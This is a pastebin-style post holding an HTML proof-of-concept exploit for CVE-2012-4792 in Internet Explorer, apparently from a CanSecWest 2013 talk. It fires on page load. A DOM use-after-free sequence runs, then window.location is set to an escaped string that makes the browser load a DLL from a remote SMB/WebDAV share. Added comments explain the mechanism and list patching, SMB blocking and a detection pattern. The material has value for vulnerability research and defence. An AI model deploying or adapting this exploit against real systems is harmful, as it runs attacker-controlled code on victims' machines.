
CVE-2012-4792 demo of "DEP/ASLR bypass without ROP/JIT"

a guest
Mar 17th, 2013
<!doctype html>
<html>
<head>
<script>
// CVE-2012-4792 demo of "DEP/ASLR bypass without ROP/JIT" in CanSecWest 2013
// Effective in 32-bit IE on x64 Windows
// Will load \\192.168.59.128\x\x.dll
// https://twitter.com/tombkeeper
//
// Reviewer note (defensive context): this paste is a public proof-of-concept
// for an Internet Explorer memory-safety bug, not a web page meant to be
// served. Handle it as malicious sample material: open it only in an isolated
// analysis environment, never in a production browser.
// The final window.location assignment is not a URL; its \u escapes spell
// out the UNC path named in the header (\\192.168.59.128\x\x.dll) followed
// by "ntdll.dll", so on a vulnerable browser the machine ends up loading a
// DLL from a remote share (SMB or WebDAV) that the attacker controls.
// Mitigation/detection: the vendor security update for CVE-2012-4792 removes
// the underlying bug; blocking outbound SMB (TCP 445/139) from workstations
// prevents the remote DLL fetch; and the pattern "applyElement +
// CollectGarbage, then window.location assigned a non-URL \u-escaped string"
// is a usable static indicator for content-inspection or proxy rules.
function GIFT() {
    var e0 = null;
    var e1 = null;
    var e2 = null;

    try {
        // DOM manipulation sequence over the two placeholder elements in
        // <body> (form#a, dfn#b) plus a freshly created <q>. Presumably the
        // exact order of these calls is what reaches the vulnerable code
        // path in unpatched IE -- that cannot be verified from this file.
        e0 = document.getElementById("a");
        e1 = document.getElementById("b");
        e2 = document.createElement("q");
        e1.applyElement(e2);
        e1.appendChild(document.createElement('button'));
        e1.applyElement(e0);
        e2.outerText = "";
        e2.appendChild(document.createElement('body'));
    } catch(e) { } // any DOM exception is swallowed; execution continues regardless
    CollectGarbage(); // JScript (IE-only) built-in: triggers a garbage-collection pass before navigating
    // Not a navigation target: the escaped string decodes to
    // "\\192.168.59.128\x\x.dll" + "ntdll.dll" (see header comment above).
    window.location = "\u0274\u7ffe\u4242\u4242\u0014\u0030\u0044" +
    "\u0012\u1212\u0004\u005c\u005c\u0031\u0039\u0032\u002e\u0031" +
    "\u0036\u0038\u002e\u0035\u0039\u002e\u0031\u0032\u0038\u005c" +
    "\u0078\u005c\u0078\u002e\u0064\u006c\u006c\u006e\u0074\u0064" +
    "\u006c\u006c\u002e\u0064\u006c\u006c";
}

</script>
</head>
<!-- GIFT() has no return statement, so eval() here is effectively a bare
     call; the inline handler fires GIFT() as soon as the page has loaded. -->
<body onload="eval(GIFT())">
    <!-- Placeholder elements looked up by GIFT() via getElementById. -->
    <form id="a">
    </form>
    <dfn id="b">
    </dfn>
</body>
</html>